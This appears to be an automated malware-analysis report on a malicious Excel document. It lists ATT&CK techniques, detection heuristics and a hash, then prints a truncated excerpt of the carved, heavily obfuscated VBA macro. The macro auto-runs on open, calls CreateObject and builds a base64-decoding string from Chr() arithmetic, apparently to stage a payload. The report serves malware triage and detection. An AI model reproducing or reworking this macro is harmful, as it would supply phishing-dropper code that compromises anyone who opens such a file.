Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Workbook_Open event, which is a common technique for executing malicious code upon opening the document. The presence of obfuscated code and a 'CreateObject' call suggests the macro attempts to download and execute a secondary payload. The obfuscation method using split string literals is noted.
Heuristics (6)

- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Dangerous API name reassembled from split string literals (critical) [OLE_VBA_SPLIT_KEYWORD_OBFUSCATION]: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- Workbook_Open macro (high) [OLE_VBA_WBOPEN]: Workbook_Open macro.
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11924 bytes |

SHA-256: 6b04f2f58be0fdd5eb44fde6991a5ba4e62758a617d338ba6c6f32a85833b962

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 5 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
ErU_pWUS1yrJ.AfrLv4kxEWmTI9UYFHpr
While 7 = 37
Dim CcqJvFdeuX7nA As Boolean
Wend
Dim nvbzNaic7c As Worksheet
While 26 = 39
Dim wsl82TNTsECf As Boolean
Wend
Dim yfYnX_CpZ8SdL3 As Worksheet
While 27 = 40
Dim h1pFNE9lWCdflY As Boolean
Wend
Dim Hl45kNmRyvIW4vm As Worksheet
While 6 = 32
Dim xXGt8vVmlz7fLHV As Boolean
Wend
Dim I2blgxDX37ONB46 As Worksheet
While 1 = 46
Dim zJL8hmVummv As Boolean
Wend
Dim PDmrZIalQ5 As Worksheet
While 1 = 55
Dim PNyt_MwrfTs As Boolean
Wend
Dim p_vSMjrwEx As Worksheet
While 3 = 39
Dim tyvTNMy_jPn537 As Boolean
Wend
Dim GxmG85EaNjD1 As Worksheet
While 22 = 38
Dim WKirxKFQc_7n8 As Boolean
Wend
Dim h3asaAD2V_u_nF3 As Worksheet
While 18 = 40
Dim RiJPWzle1a As Boolean
Wend
Dim bxjbGz8HXA As Worksheet
While 9 = 42
Dim nqwi99AFwmIDMY As Boolean
Wend
Dim JYuWjrP529hOP As Worksheet
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ErU_pWUS1yrJ"
Dim HwCKBIG_ug_aIzmbdpT__GGK_qfr3jdmRpXzsaw5QIOrisA72pW_tNS_nzETlYEIC As String
Dim ZtiRd73Z2__zyL2p7nf5HEpNwCch2ee6VRmkJJvpNAR_ZhuW_jCQF6PSCSeacShVhCceiPdv2ypFwkwNP_bPbLxYBRgzoSK4b6eVDNxxEPXQOHfaeOIXzP3TNDcOsmEhmvmzEZJBOnJKxfI2uETY As String
Dim M_C8W6fkDzQxN1BFpOplW7vUrKy5OXr1G2KzhcahTEc3F_wTl_E5rFiPRpOKEjTnFYpVnJg As String
Dim Fcv9jhppTypnCM8rE4cUu8dIE1Bke6AApQMrvmhgdLYW7B_aF2F5BjQH8k2se_JWxo7u9O6bU5zghFLDuicly_8___sItyAYAAhQDSb16miEssj1Xw75jhhrp1u4euqf3Zefg49aFloJe1TOd As Integer
Function Eer1LkvkPXxeqMQXiJQrDjgosrywArqFI2fmTUKhlIEK4uLnpHpEkLze7C(CeH4Lrc3y6AtkOfHCYjXgkEgRNZb6JDkR1pLm_fIfbjNr_UtdPnGbKIaYjk7P_6n2Y)
While 16 = 46
Dim j6P6mkxNQJGAhdX As Boolean
Wend
Dim ba_nuNhhTc As Worksheet
While 19 = 51
Dim s8d_yl_YAdIuoMD As Boolean
Wend
Dim k1jomr5OsiQ As Worksheet
Dim lIuZdIBRVtrhAk_yZCZK9OrhpnJ_P6CIdY3BRQGMbdV2lo4hssv9s3_UZKsy8ABZqgDkq
While 24 = 58
Dim ILaQAW5a3mRNbg As Boolean
Wend
Dim Ckf_Mqv1iHV73 As Worksheet
While 17 = 54
Dim qtxqtYfb17sbv As Boolean
Wend
Dim zLTYRkGFjF As Worksheet
Dim stuFMZWIx3AlJFnGtzh5X9nCKzbFoYemRCnOXsDuQ1RQ7o8RixUVLItt_r4V8PdXVVRGbXr_vwmfoU_e2HfzCHZHR3Ioypw_V45jUzzIETiYfLDslWdxsmTM5IyhMCJ
While 2 = 56
Dim WOe2eRmR4CdM As Boolean
Wend
Dim qD6gx6DJmwgazhe As Worksheet
While 21 = 46
Dim HztyuElYZNgAH As Boolean
Wend
Dim MnxXPleOctwKC As Worksheet
While 16 = 33
Dim YcjrCA7vcbIMs As Boolean
Wend
Dim FDmdRP45789GIM As Worksheet
While 21 = 47
Dim BOo_7mrpHyrKfC As Boolean
Wend
Dim UsKnJgdak8 As Worksheet
Set stuFMZWIx3AlJFnGtzh5X9nCKzbFoYemRCnOXsDuQ1RQ7o8RixUVLItt_r4V8PdXVVRGbXr_vwmfoU_e2HfzCHZHR3Ioypw_V45jUzzIETiYfLDslWdxsmTM5IyhMCJ = CreateObject(ZtiRd73Z2__zyL2p7nf5HEpNwCch2ee6VRmkJJvpNAR_ZhuW_jCQF6PSCSeacShVhCceiPdv2ypFwkwNP_bPbLxYBRgzoSK4b6eVDNxxEPXQOHfaeOIXzP3TNDcOsmEhmvmzEZJBOnJKxfI2uETY)
While 24 = 42
Dim aePFbdji2v As Boolean
Wend
Dim fxVKiAZ5wv As Worksheet
While 1 = 57
Dim Ft1hLvT7lrj As Boolean
Wend
Dim mpmaVjLmNGR As Worksheet
HwCKBIG_ug_aIzmbdpT__GGK_qfr3jdmRpXzsaw5QIOrisA72pW_tNS_nzETlYEIC = Chr(452 - 354) & Chr(472 - 367) & Chr(421 - 311) & Chr(412 - 366) & Chr(400 - 302) & Chr(291 - 194) & Chr(139 - 24) & Chr(361 - 260) & Chr(394 - 340) & Chr(129 - 77)
While 9 = 32
Dim sHy5xakeDfwKTuX As Boolean
Wend
Dim hNrOlNCS3Gs As Worksheet
While 28 = 49
Dim sKZLPhnw_qsQ7 As Boolean
Wend
Dim UFnDydRo7B As Worksheet
Set lIuZdIBRVtrhAk_yZCZK9OrhpnJ_P6CIdY3BRQGMbdV2lo4hssv9s3_UZKsy8ABZqgDkq = stuFMZWIx3AlJFnGtzh5X9nCKzbFoYemRCnOXsDuQ1RQ7o8RixUVLItt_r4V8PdXVVRGbXr_vwmfoU_e2HfzCHZHR3Ioypw_V45jUzzIETiYfLDsl
```

... (truncated)